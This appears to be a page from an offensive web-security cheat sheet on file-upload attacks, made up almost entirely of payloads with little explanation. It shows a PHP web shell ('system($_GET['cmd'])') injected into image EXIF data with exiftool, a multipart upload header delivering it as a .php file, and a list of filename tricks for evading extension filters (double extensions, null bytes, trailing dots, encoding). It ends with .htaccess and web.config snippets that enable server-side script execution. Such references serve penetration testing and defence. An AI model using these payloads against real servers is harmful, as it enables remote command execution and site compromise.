File uploads

Polyglot files

# Add PHP code to exif headers
exiftool -Comment='<?php system($_GET['cmd']); ?>' <file>.jpg

Content-Disposition: form-data; name="avatar"; filename="<file>.jpg.php"
Content-Type: application/x-php

Obfuscating file extensions

# Provide multiple extensions
exploit.php.jpg

# Add trailing characters
exploit.php.
exploit.php/

# URL encode 
exploit%2Ephp

# Add semicolons or null bytes before extensions
exploit.asp;.jpg
exploit.php%00.jpg

# Bypass extension strippers
exploit.p.phphp

Overwriting server config files

# Allow execution of PHP for Apache web servers, add following to .htaccess file
AddHandler application/x-httpd-php .php or .<randomname>

# Allow execution of ASP for IIS web servers, add following to web.config file
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
        <handlers>
            <!-- Enable ASP.NET for ASPX files -->
            <add name="ASPXHandler" path="*.aspx" verb="*" type="System.Web.UI.PageHandlerFactory" preCondition="integratedMode" />
            <!-- Enable ASP for ASP files -->
            <add name="ASPHandler" path="*.asp" verb="*" modules="IsapiModule" scriptProcessor="%SystemRoot%\System32\inetsrv\asp.dll" resourceType="Unspecified" preCondition="" />
        </handlers>
    </system.webServer>
</configuration>

PreviousHTTP request smuggling NextJWT

Last updated 9 months ago